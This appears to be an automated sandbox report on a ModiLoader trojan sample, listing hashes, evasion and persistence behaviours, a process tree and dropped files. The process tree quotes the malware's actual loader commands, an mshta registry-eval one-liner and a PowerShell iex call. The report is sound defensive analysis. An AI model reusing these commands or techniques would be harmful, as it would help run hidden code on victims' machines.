Overview

overview

10

Static

static

3

e5990b6288...18.exe

windows7-x64

10

e5990b6288...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-09-2024 21:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe

  • Size

    280KB

  • MD5

    e5990b62885a2d4e4da05061716ff52d

  • SHA1

    4db4280bcfe42ca1445cf89ac0b05644734f4699

  • SHA256

    06590a959dc72ebcf89ead6e3e6237c9e2284a038a8d96e72434676d0b4eaeea

  • SHA512

    fce76198d0708586fd745130e88973d6f95736b883981af97219d65e97c2a7057e07e931a3f4416f8fc77a3df91fe30c371387e43a1fbaf543cafb2b424bc634

  • SSDEEP

    6144:/pvfrqWmBumMz5rCDcmu3IXiWkHuVtxydKvyGILI/B2/pFi:/pvJlCAmZXRLydKvyGILI/W0

Score
10/10
modiloaderdiscoveryevasionexecutionpersistencetrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
    evasion
  • ModiLoader Second Stage 60 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\e5990b62885a2d4e4da05061716ff52d_JaffaCakes118.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2528
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:GWz0uvq9="mQ";OV45=new%20ActiveXObject("WScript.Shell");y9NcVrOc0="ftmm";Xcjx9=OV45.RegRead("HKLM\\software\\Wow6432Node\\nKaTvzf1A\\KydwOX1");vu6a4Kc="SIJSYB";eval(Xcjx9);TtXWq4E8="IA";
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:dnkjhxjl
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2856
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:868

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\ebdc03\215619.lnk
    Filesize

    877B

    MD5

    cbb74f53fbb2a6eb60132c914ecb5d70

    SHA1

    80f66a9ef7f0c45933b05fe294879fdac8f5aa2b

    SHA256

    713c3427f4159319cc97d39db1ff9b4ffacf6b2755d9aa24e883fc0c50973a3d

    SHA512

    cdc9e523bbd01bceb96833de928c16dfbfb7a87af890d58567d77d502829b3b9d2ec710d20deec7c0d129120fecf9e2db1e987b8fa164a3a8cbf31a751cc5d5d

    Download Submit

  • C:\Users\Admin\AppData\Local\ebdc03\51555c.4f6ae76
    Filesize

    16KB

    MD5

    370263dbaf7164fe521eaffca1ece32d

    SHA1

    1522d591a514b1ab093e495495e0753396f7a32a

    SHA256

    501a6c4b3d70ecad8c833c0e881911ca48997bd4e00bf85aaffb46583e774ec5

    SHA512

    341902342234c141da901ed237c1346ae7e4a9c595cc69218e3ab9b5ae02cabdfc00ddc1501cec5b45fecbabcb6d568d642f5a5b591565ca2794d4a56267023f

    Download Submit

  • C:\Users\Admin\AppData\Local\ebdc03\6a53be.bat
    Filesize

    61B

    MD5

    1897758044c2f640c22d80e173b0f614

    SHA1

    9849aa3773f84b1a1f637219922167e54a0eb215

    SHA256

    22e0f7b0ba10364605537b6363b328383c60049877f3c803664d3f0ba1a5b554

    SHA512

    d6fc74057f64e23d8a68b30e55c3b85480e87c833e249905a5b515dabd4859f7905718ccc3f0b206bb97afa02a7c6672fefa78bff7f37371d2e540a862e67c25

    Download Submit

  • C:\Users\Admin\AppData\Roaming\7de94e\44ed7f.4f6ae76
    Filesize

    34KB

    MD5

    70036e3045ed779f049547039c5c6aa4

    SHA1

    c7aae9d649f93b70f9d9e48c168fc26458f6b1b7

    SHA256

    61a5afa0523252a76f030123ee624ebfb6dc58e55d7529d4c987a23be792cabf

    SHA512

    4daa56db1a3d359a1e379050cc3496c4dfe02e2ce1798dd68a1f61088e78a7322d3d0c25975429116988ed6c24d63e4517d4360527b21b893d81d09a9221c0e8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adf349.lnk
    Filesize

    987B

    MD5

    532bc2ebed09bcfadbbee7bda8e56af9

    SHA1

    2862bdef8c998e7560cf52e864ad590bd9d8cbfc

    SHA256

    9282472908764d8251b6e6252e238023b64d3619e63243e85ca5a17459827713

    SHA512

    06db0f8fc86599b247bcb981049c2c85996965f88a7a9eef2456ab61ea3464c08c978f542b7f8f68c5908e53aae554b1ef2efcd22e3d4552a07b4c853df40762

    Download Submit

  • memory/868-78-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-81-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-87-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-86-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-85-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-84-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-83-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-82-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-80-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-79-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-73-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-72-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-74-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-75-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-76-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/868-77-0x0000000000270000-0x00000000003B1000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2528-2-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/2528-4-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/2528-5-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/2528-10-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2528-6-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2528-7-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2528-8-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2528-12-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2528-11-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2528-9-0x0000000001D70000-0x0000000001E46000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2680-31-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-47-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-57-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-56-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-55-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-54-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-49-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-43-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-42-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-40-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-39-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-37-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-36-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-44-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-45-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-46-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-66-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-58-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-48-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-65-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-35-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-33-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-32-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-30-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-41-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-28-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-38-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-34-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-29-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-27-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-23-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2680-25-0x0000000000210000-0x0000000000351000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2856-26-0x0000000006190000-0x0000000006266000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2856-22-0x0000000006190000-0x0000000006266000-memory.dmp

    Filesize

    856KB

    Download